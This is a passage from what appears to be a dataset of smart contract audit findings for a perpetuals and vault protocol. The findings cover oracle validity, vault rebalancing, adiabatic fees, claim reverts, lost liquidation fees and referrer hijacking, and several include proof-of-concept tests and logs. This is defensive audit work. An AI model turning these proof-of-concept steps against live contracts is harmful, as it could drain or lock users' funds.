version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nLater, `Market._processOrderGlobal` reads the oracle version using the `oracle.at`, invalidating the order if the version is invalid:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp);\\n\\n context.pending.global.sub(newOrder);\\n if (!oracleVersion.valid) newOrder.invalidate();\\n```\\n\\nHowever, expired oracle version will return `valid = true`, because this flag is only set to `false` if price = 0:\\n```\\nfunction at(uint256 timestamp) public view returns (OracleVersion memory oracleVersion) {\\n (oracleVersion.timestamp, oracleVersion.price) = (timestamp, _prices[timestamp]);\\n oracleVersion.valid = !oracleVersion.price.isZero(); // @audit <<< valid = false only if price = 0\\n}\\n```\\n\\nThis means that `_processOrderGlobal` will treat this expired oracle version as valid and won't invalidate the order.",Add validity map along with the price map to `KeeperOracle` when recording commited price.,"Market uses invalid (expired) oracle versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.",```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n +"When vault's market weight is set to 0 to remove the market from the vault, vault's leverage in this market is immediately set to max leverage risking position liquidation",medium,"If any market has to be removed from the vault, the only way to do this is via setting this market's weight to 0. The problem is that the first vault rebalance will immediately withdraw max possible collateral from this market, leaving vault's leverage at max possible leverage, risking the vault's position liquidation. This is especially dangerous if vault's position in this removed market can not be closed due to high skew, so min position is not 0, but the leverage will be at max possible value. As a result, vault depositors can lose funds due to liquidation of vault's position in this market.\\nWhen vault is rebalanced, each market's collateral is calculated as following:\\n```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n\\nFor removed markets (weight = 0), `marketCollateral` will be set to `marketContext.margin` (i.e. minimum valid collateral to have position at max leverage), `marketAssets` will be set to 0. But later the position will be adjusted in case minPosition is not 0:\\n```\\n target.position = marketAssets\\n .muldiv(marketContext.registration.leverage, marketContext.latestPrice.abs())\\n .max(marketContext.minPosition)\\n .min(marketContext.maxPosition);\\n```\\n\\nThis means that vault's position in the market with weight 0 will be at max leverage until liquidated or position can be closed.\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n console.log(""pos1 = "" + (await position()) + "" pos2 = "" + (await btcPosition()) + "" col1 = "" + (await collateralInVault()) + "" col2 = "" + (await btcCollateralInVault()));\\n\\n // update weight\\n await vault.connect(owner).updateWeights([parse6decimal('1.0'), parse6decimal('0')])\\n\\n // do small withdrawal to trigger rebalance\\n await vault.connect(user).update(user.address, 0, smallDeposit, 0)\\n await updateOracle()\\n\\n console.log(""pos1 = "" + (await position()) + "" pos2 = "" + (await btcPosition()) + "" col1 = "" + (await collateralInVault()) + "" col2 = "" + (await btcCollateralInVault()));\\n })\\n```\\n\\nConsole log:\\n```\\npos1 = 12224846 pos2 = 206187 col1 = 8008000000 col2 = 2002000000\\npos1 = 12224846 pos2 = 206187 col1 = 9209203452 col2 = 800796548\\n```\\n\\nNotice, that after rebalance, position in the removed market (pos2) is still the same, but the collateral (col2) reduced to minimum allowed.",Ensure that the market's collateral is based on leverage even if `weight = 0`,"Market removed from the vault (weight set to 0) is put at max leverage and has a high risk of being liquidated, thus losing vault depositors funds.",```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n +"Makers can lose funds from price movement even when no long and short positions are opened, due to incorrect distribution of adiabatic fees exposure between makers",medium,"Adiabatic fees introduced in this new update of the protocol (v2.3) were introduced to solve the problem of adiabatic fees netting out to 0 in market token's rather than in USD terms. With the new versions, this problem is solved and adiabatic fees now net out to 0 in USD terms. However, they net out to 0 only for the whole makers pool, but each individual maker can have profit or loss from adiabatic fees at different price levels all else being equal. This creates unexpected risk of loss of funds from adiabatic fees for individual makers, which can be significant, up to several percents of the amount invested.\\nThe issue is demonstrated in the following scenario:\\n`price = 1`\\nAlice open `maker = 10` (collateral = +0.9 from adiabatic fee)\\nBob opens `maker = 10` (collateral = +0.7 from adiabatic fee)\\nPath A. `price = 1`. Bob closes (final collateral = +0), Alice closes (final collaterral = +0)\\nPath B. `price = 2`. Bob closes (final collateral = +0.1), Alice closes (final collaterral = -0.1)\\nPath C. `price = 0.5`. Bob closes (final collateral = -0.05), Alice closes (final collateral = +0.05)\\nNotice that both Alice and Bob are the only makers, there are 0 longs and 0 shorts, but still both Alice and Bob pnl depends on the market price due to pnl from adiabatic fees. Adiabatic fees net out to 0 for all makers aggregated (Alice + Bob), but not for individual makers. Individual makers pnl from adiabatic fees is more or less random depending on the other makers who have opened.\\nIf Alice were the only maker, then:\\nprice = 1\\nAlice opens `maker = 10` (collateral = +0.9)\\nprice = 2: exposure adjusted +0.9 (Alice collateral = +1.8)\\nAlice closes `maker = 10` (adiabatic fees = `-1.8`, Alice final collateral = 0)\\nFor the lone maker there is no such problem, final collateral is 0 regardless of price. The core of the issue lies in the fact that the maker's adiabatic fees exposure adjustment is weighted by makers open maker amount. So in the first example:\\nprice = 1. Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split evenly between Alice and Bob (+0.8 for each)\\nAlice new exposure = 0.9 + 0.8 = +1.7 (but adiabatic fees paid to close = -1.8)\\nBob new exposure = 0.7 + 0.8 = +1.5 (but adiabatic fees paid to close = -1.4)\\nIf maker exposure adjustment was weighted by individual makers exposure, then all is correct:\\nprice = 1. Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split 0.9:0.7 between Alice and Bob, e.g. +0.9 for Alice, +0.7 for Bob\\nAlice new exposure = 0.9 + 0.9 = +1.8 (adiabatic fees paid to close = -1.8, net out to 0)\\nBob new exposure = 0.7 + 0.7 = +1.4 (adiabatic fees paid to close = -1.4, net out to 0)\\nIn the worst case, in the example above, if Bob opens `maker = 40` (adiabatic fees scale = 50), then at `price = 2`, Alice's final collateral is `-0.4` due to adiabatic fees. Given that Alice's position is 10 at `price = 2` (notional = 20), a loss of `-0.4` is a loss of `-2%` at 1x leverage, which is quite significant.\\nThe scenario above is demonstrated in the test, change the following test in test/unit/market/Market.test.ts:\\n```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(""user collateral = "" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(""userB collateral = "" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(""ver"" + ver + "": makerValue="" + v.makerValue + "" longValue="" + v.longValue + \\n "" makerPosFee="" + v.makerPosFee + "" makerNegFee="" + v.makerNegFee +\\n "" takerPosFee="" + v.takerPosFee + "" takerNegFee="" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n\\nConsole log:\\n```\\nuser collateral = 10000000000\\nuserB collateral = 0\\nver1636401093: makerValue=0 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000000000\\nver1636401193: makerValue=0 longValue=0 makerPosFee=9000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000070000\\nver1636401293: makerValue=0 longValue=0 makerPosFee=7000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000150000\\nver1636401393: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000010000\\nver1636401493: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=-14000 takerPosFee=0 takerNegFee=0\\nuser collateral = 9999990000\\nuserB collateral = 10000010000\\nver1636401593: makerValue=-5500 longValue=0 makerPosFee=0 makerNegFee=-4500 takerPosFee=0 takerNegFee=0\\n```\\n\\nNotice, that final user balance is -0.1 and final userB balance is +0.1","Split the total maker exposure by individual maker's exposure rather than by their position size. To do this:\\nAdd another accumulator to track total `exposure`\\nAdd individual maker `exposure` to user's `Local` storage\\nWhen accumulating local storage in the checkpoint, account global accumulator `exposure` weighted by individual user's `exposure`.","Individual makers bear an additional undocumented price risk due to adiabatic fees, which is quite significant (can be several percentages of the notional).","```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(""user collateral = "" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(""userB collateral = "" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(""ver"" + ver + "": makerValue="" + v.makerValue + "" longValue="" + v.longValue + \\n "" makerPosFee="" + v.makerPosFee + "" makerNegFee="" + v.makerNegFee +\\n "" takerPosFee="" + v.takerPosFee + "" takerNegFee="" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n" +All transactions to claim assets from the vault will revert in some situations due to double subtraction of the claimed assets in market position allocations calculation.,medium,"When `assets` are claimed from the vault (Vault.update(0,0,x) called), the vault rebalances its collateral. There is an issue with market positions allocation calculations: the `assets` (""total position"") subtract claimed amount twice. This leads to revert in case this incorrect `assets` amount is less than `minAssets` (caused by market's minPosition). In situations when the vault can't redeem due to some market's position being at the `minPosition` (because of the market's skew, which disallows makers to reduce their positions), this will lead to all users being unable to claim any `assets` which were already redeemed and settled.\\n`Vault.update` rebalances collateral by calling _manage:\\n```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n\\nIn the rebalance calculations, collateral and assets (assets here stands for ""total vault position"") are calculated as following:\\n```\\n UFixed6 collateral = UFixed6Lib.unsafeFrom(strategy.totalCollateral).add(deposit).unsafeSub(withdrawal);\\n UFixed6 assets = collateral.unsafeSub(ineligable);\\n\\n if (collateral.lt(strategy.totalMargin)) revert StrategyLibInsufficientCollateralError();\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\n`ineligable` is calculated as following:\\n```\\nfunction _ineligable(Context memory context, UFixed6 withdrawal) private pure returns (UFixed6) {\\n // assets eligable for redemption\\n UFixed6 redemptionEligable = UFixed6Lib.unsafeFrom(context.totalCollateral)\\n .unsafeSub(withdrawal)\\n .unsafeSub(context.global.assets)\\n .unsafeSub(context.global.deposit);\\n\\n return redemptionEligable\\n // approximate assets up for redemption\\n .mul(context.global.redemption.unsafeDiv(context.global.shares.add(context.global.redemption)))\\n // assets pending claim\\n .add(context.global.assets)\\n // assets withdrawing\\n .add(withdrawal);\\n}\\n```\\n\\nNotice that `ineligable` adds `withdrawal` in the end (which is the assets claimed by the user). Now back to collateral and assets calculation:\\n`collateral = totalCollateral + deposit - withdrawal`\\n`assets = collateral - ineligable = collateral - (redemptionEligable * redemption / (redemption + shares) + global.assets + withdrawal)`\\n`assets = totalCollateral + deposit - withdrawal - [redemptionIneligable] - global.assets - withdrawal`\\n`assets = totalCollateral + deposit - [redemptionIneligable] - global.assets - 2 * withdrawal`\\nSee that `withdrawal` (assets claimed by the user) is subtracted twice in assets calculations. This means that assets calculated are smaller than it should. In particular, assets might become less than minAssets thus reverting in the following line:\\n```\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\nPossible scenario for this issue to cause inability to claim funds:\\nSome vault market's has a high skew (|long - short|), which means that minimum maker position is limited by the skew.\\nUser redeems large amount from the vault, reducing vault's position in that market so that market maker ~= |long - short|. This means that further redeems from the vault are not possible because the vault can't reduce its position in the market.\\nAfter that, the user tries to claim what he has redeemed, but all attempts to redeem will revert (both for this user and for any other user that might want to claim)\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n var half = smallDeposit.add(largeDeposit).div(2).add(smallDeposit);\\n await vault.connect(user).update(user.address, 0, half, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).update(user2.address, smallDeposit, 0, 0) // this will create min position in the market\\n await vault.connect(user).update(user.address, 0, 0, half) // this will revert even though it's just claiming\\n })\\n```\\n\\nThe last line in the test will revert, even though it's just claiming assets. If the pre-last line is commented out (no ""min position"" created in the market), it will work normally.",Remove `add(withdrawal)` from `_ineligable` calculation in the vault.,"In certain situations (redeem not possible from the vault due to high skew in some underlying market) claiming assets from the vault will revert for all users, temporarily (and sometimes permanently) locking user funds in the contract.","```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n" +"If referral or liquidator is the same address as the account, then liquidation/referral fees will be lost due to local storage being overwritten after the `claimable` amount is credited to liquidator or referral",medium,"Any user (address) can be liquidator and/or referral, including account's own address (the user can self-liquidate or self-refer). During the market settlement, liquidator and referral fees are credited to liquidator/referral's `local.claimable` storage. The issue is that the account's local storage is held in the memory during the settlement process, and is saved into storage after settlement/update. This means that `local.claimable` storage changes for the account are not reflected in the in-memory cached copy and discarded when the cached copy is saved after settlement.\\nThis leads to liquidator and referral fees being lost when these are the account's own address.\\nDuring market account settlement process, in the `_processOrderLocal`, liquidator and referral fees are credited to corresponding accounts via:\\n```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n\\nHowever, for the account the cached copy of `_locals[account]` is stored after the settlement in _storeContext:\\n```\\nfunction _storeContext(Context memory context, address account) private {\\n // state\\n _global.store(context.global);\\n _locals[account].store(context.local);\\n// rest of code\\n```\\n\\nThe order of these actions is:\\n```\\nfunction settle(address account) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n\\n _settle(context, account);\\n\\n _storeContext(context, account);\\n}\\n```\\n\\nLoad `_locals[account]` into memory (context.local)\\nSettle: during settlement `_locals[account].claimable` is increased for liquidator and referral. Note: this is not reflected in `context.local`\\nStore cached context: `_locals[account]` is overwritten with the `context.local`, losing `claimable` increased during settlement.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('self-liquidation fees lost', async () => {\\nconst POSITION = parse6decimal('100.000')\\nconst COLLATERAL = parse6decimal('120')\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nvar time = TIMESTAMP;\\n\\nsetupOracle('1', time, time + 100);\\nawait market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\n\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\n\\n// self-liquidate\\nsetupOracle('0.7', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, true);\\n\\n// settle liquidation\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\nawait market.settle(userB.address);\\nvar info = await market.locals(userB.address);\\nconsole.log(""Claimable userB: "" + info.claimable);\\n```\\n\\nConsole log:\\n```\\nClaimable userB: 0\\n```\\n",Modify `Market._credit` function to increase `context.local.claimable` if account to be credited matches account which is being updated.,"If user self-liquidates or self-refers, the liquidation and referral fees are lost by the user (and are stuck in the contract, because they're still subtracted from the user's collateral).","```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n" +_loadContext() uses the wrong pendingGlobal.,medium,"`StrategyLib._loadContext()` is using the incorrect `pendingGlobal`, causing `currentPosition`, `minPosition`, and `maxPosition` to be incorrect, leading to incorrect rebalance operation.\\nIn `StrategyLib._loadContext()`, there is a need to compute `currentPosition`, `minPosition`, and `maxPosition`. The code as follows:\\n```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n\\nThe code above `pendingGlobal = registration.market.pendings(address(this));` is wrong It takes the address(this)'s `pendingLocal`. The correct approach is to use `pendingGlobal = registration.market.pending();`.",```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n// Remove the line below\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n// Add the line below\\n Order memory pendingGlobal = registration.market.pending();\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n,"Since `pendingGlobal` is wrong, `currentPosition`, `minPosition` and `maxPosition` are all wrong. affects subsequent rebalance calculations, such as `target.position` etc. rebalance does not work properly",```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n +Liquidator can set up referrals for other users,medium,"If a user has met the liquidation criteria and currently has no referrer then a malicious liquidator can specify a referrer in the liquidation order. making it impossible for subsequent users to set up the referrer they want.\\nCurrently, there are 2 conditions to set up a referrer\\nthe order cannot be empty (Non-empty orders require authorization unless they are liquidation orders)\\nthere can't be another referrer already\\n```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n\\nHowever, if the user does not have a referrer, the liquidation order is able to meet both of these restrictions\\nThis allows the liquidator to set up referrals for other users.\\nWhen the user subsequently tries to set up a referrer, it will fail.","Restrictions on Liquidation Orders Cannot Set a referrer\\n```\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n// Add the line below\\n if (newOrder.protected() && referrer != address(0)) revert MarketInvalidReferrerError;\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n```\\n","If a user is set up as a referrer by a liquidated order in advance, the user cannot be set up as anyone else.","```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n" +"Vault and oracle keepers DoS in some situations due to `market.update(account,max,max,max,0,false)`",medium,"When user's market account is updated without position and collateral change (by calling market.update(account,max,max,max,0,false)), this serves as some kind of ""settling"" the account (which was the only way to settle the account before v2.3). However, this action still reverts if the account is below margin requirement.\\nThe issue is that some parts of the code use this action to ""settle"" the 